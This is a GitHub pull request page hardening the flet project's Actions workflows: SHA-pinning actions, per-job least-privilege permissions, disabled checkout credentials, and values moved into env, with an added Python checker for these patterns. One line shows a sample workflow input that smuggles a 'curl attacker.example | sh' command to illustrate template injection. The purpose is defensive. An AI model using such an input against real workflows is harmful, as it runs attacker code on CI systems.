ci: zizmor security checks #6602
Pull request overview
This PR hardens the repository’s GitHub Actions workflows by pinning third‑party actions to specific commit SHAs, tightening GITHUB_TOKEN permissions to least privilege (often per-job), and standardizing safer environment usage/caching behavior across CI and ancillary workflows.
Changes:
- Pin commonly used actions (checkout, setup-node, setup-uv, flutter/dart, docker, artifact upload/download, release) to commit SHAs and disable `persist-credentials` on checkouts.
- Move from broad workflow-level permissions to more restrictive per-job permissions across multiple workflows.
- Make caching behavior conditional (typically disabling caches on tag refs) and reduce inline `${{ }}` usage in shell steps by routing values through `env`.
Reviewed changes
Copilot reviewed 7 out of 7 changed files in this pull request and generated no comments.
| File | Description |
|---|---|
| .github/workflows/release-pr-changelog.yml | Pins checkout and restricts token permissions for the changelog gate workflow. |
| .github/workflows/macos-integration-tests.yml | Pins actions, disables checkout credential persistence, and makes caching conditional. |
| .github/workflows/flet-build-test.yml | Applies least-privilege permissions, pins actions, disables checkout credential persistence, and makes caching conditional. |
| .github/workflows/flet-build-image.yml | Shifts to per-job permissions, pins docker/actions dependencies, and routes context into env vars for shell steps. |
| .github/workflows/docs.yml | Pins actions, disables checkout credential persistence, and adds conditional caching. |
| .github/workflows/ci.yml | Broadly pins actions, tightens per-job permissions, disables checkout credential persistence, and standardizes conditional caching/env usage across CI/release jobs. |
| - name: Setup Node.js | ||
| uses: actions/setup-node@v4 | ||
| uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6.4.0 |
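Review bot: the pin on this line jumps actions/setup-node from the v4 line to v6.4.0 in the same edit that converts the tag to a SHA, so this hunk is a two-major-version upgrade and not only a hardening; call that out in the PR description and confirm the commit really is the v6.4.0 tag before merging, e.g. `git ls-remote --tags https://github.com/actions/setup-node v6.4.0`. Keep the `# v6.4.0` comment exact, since Dependabot and Renovate read it to keep SHA pins updated.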
| - name: Create/Update GitHub Release | ||
| uses: softprops/action-gh-release@v2 | ||
| uses: softprops/action-gh-release@b4309332981a82ec1c5618f44dd2e27cc8bfbfda # v3.0.0 |
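Review bot: same concern as the setup-node pin: softprops/action-gh-release moves from v2 to v3.0.0 here, and a `.0` release on a major boundary is where input names and defaults most often change, so verify the SHA against the v3.0.0 tag (`git ls-remote --tags https://github.com/softprops/action-gh-release v3.0.0`) and re-run the release job once on a throwaway tag before trusting it on a real one. This step also needs `contents: write` in its job's `permissions` block now that the workflow-level grant is gone.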
Deploying flet-website-v2 with
- Latest commit: 5c910cf
- Status: ✅ Deploy successful!
- Preview URL: https://3c38e54c.flet-website-v2.pages.dev
- Branch Preview URL: https://zizmor.flet-website-v2.pages.dev
Brought in all flet-0.86 changes (multi-Python build matrix, flet clean command, pubsub typing, secure-storage bump, etc.) and applied zizmor security fixes to the new flet-build-test-matrix.yml:
- Pinned actions/checkout, setup-uv, upload-artifact, and flutter-fvm-config-action/setup to SHA hashes
- Added persist-credentials: false to checkout
- Added permissions: contents: read to the build job
- Moved inputs.python_version into env to fix template-injection
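The four fixes named in the review summary and in the flet-build-test-matrix.yml commit above (SHA pinning, `persist-credentials: false`, job-level `permissions`, and moving `${{ }}` out of `run:` into `env`) can be checked mechanically. The script below is an added example written for this page, not code from the flet repository or from zizmor itself. It carries two constructed workflow snippets, one before and one after the hardening, and a small line-based checker (no YAML library) that flags each pattern. The checkout commit in the hardened sample is a placeholder SHA, not a real pin; the setup-node SHA is the one visible in this PR's diff.

```python
"""Minimal zizmor-style checker for GitHub Actions workflow text (added example, stdlib only)."""
import re
from itertools import takewhile

SHA40 = re.compile(r"^[0-9a-f]{40}$")
LIST_ITEM = re.compile(r"^\s*- ")
USES = re.compile(r"^\s*-?\s*uses:\s*(\S+)")
RUN = re.compile(r"^\s*-?\s*run:\s*(.*)$")

# Constructed sample: a job as it might look before the hardening. Not a file from
# the flet repository; it only reproduces the patterns the PR removes.
BEFORE = """\
on:
  workflow_dispatch: {inputs: {python_version: {required: true}}}
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
      - name: Build
        run: |
          echo "Building for Python ${{ inputs.python_version }}"
"""

# The same job after applying the PR's fixes. The checkout SHA is a placeholder,
# not a real pin; the setup-node SHA is the one shown in this PR's diff.
AFTER = """\
on:
  workflow_dispatch: {inputs: {python_version: {required: true}}}
permissions: {}
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - uses: actions/checkout@0000000000000000000000000000000000000000 # placeholder SHA
        with:
          persist-credentials: false
      - uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6.4.0
      - name: Build
        env:
          PY_VERSION: ${{ inputs.python_version }}
        run: |
          echo "Building for Python $PY_VERSION"
"""

def _indent(line):
    return len(line) - len(line.lstrip(" "))

def _split_steps(lines):
    """Group the lines under the first `steps:` key into one list per step."""
    steps, steps_indent, step_indent = [], None, None
    for line in (l for l in lines if l.strip()):
        if steps_indent is None:
            if line.strip() == "steps:":
                steps_indent = _indent(line)
        elif _indent(line) <= steps_indent:      # dedented past the steps list
            break
        elif LIST_ITEM.match(line) and step_indent in (None, _indent(line)):
            step_indent = _indent(line)
            steps.append([line])
        elif steps:
            steps[-1].append(line)
    return steps

def _run_body(step):
    """Text of the step's run: scalar (inline or block), or '' if it has none."""
    for i, line in enumerate(step):
        m = RUN.match(line)
        if m and m.group(1).strip()[:1] not in ("", "|", ">"):   # inline scalar
            return m.group(1)
        if m:                                     # block scalar: deeper-indented lines
            key_indent = line.index("run:")
            body = takewhile(lambda l: not l.strip() or _indent(l) > key_indent, step[i + 1:])
            return "\n".join(body)
    return ""

def lint_workflow(text):
    """Return findings for the zizmor classes this PR addresses."""
    lines = text.splitlines()
    findings = []
    perms = [l for l in lines if re.match(r"^\s*permissions:", l)]
    if not perms:
        findings.append("no permissions block: GITHUB_TOKEN keeps the repository default scopes")
    if any("write-all" in l for l in perms):
        findings.append("permissions: write-all grants every scope to GITHUB_TOKEN")
    for n, step in enumerate(_split_steps(lines), 1):
        for m in filter(None, map(USES.match, step)):
            action, _, ref = m.group(1).partition("@")
            if not action.startswith("./") and not SHA40.match(ref):
                findings.append(f"step {n}: {action} uses mutable ref '{ref or '(none)'}', not a commit SHA")
            if action == "actions/checkout" and not any(
                    re.match(r"^\s*persist-credentials:\s*false", l) for l in step):
                findings.append(f"step {n}: checkout leaves GITHUB_TOKEN in .git/config (persist-credentials defaults to true)")
        if "${{" in _run_body(step):
            findings.append(f"step {n}: ${{{{ }}}} expanded inside run: (template injection); pass the value through env")
    return findings
```

Running `lint_workflow(BEFORE)` yields five findings (the `write-all` grant, two mutable refs, the checkout that keeps its token, and the expression inside `run:`); `lint_workflow(AFTER)` yields none. The `env` move matters because an expression in `run:` is substituted into the script text before the shell ever parses it, so a `workflow_dispatch` input such as `3.12"; curl attacker.example | sh; echo "` becomes shell code, whereas a value handed over in `env` reaches the step as an environment variable that the shell does not re-parse. This checker keys off indentation and will miss flow-style YAML or steps defined in reusable workflows; the real zizmor parses the YAML properly and should be what runs in CI.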
Summary by Sourcery
Tighten GitHub Actions permissions, pin third‑party actions to specific SHAs, and improve caching and environment handling across CI, docs, image build, and release workflows.
Build:
CI: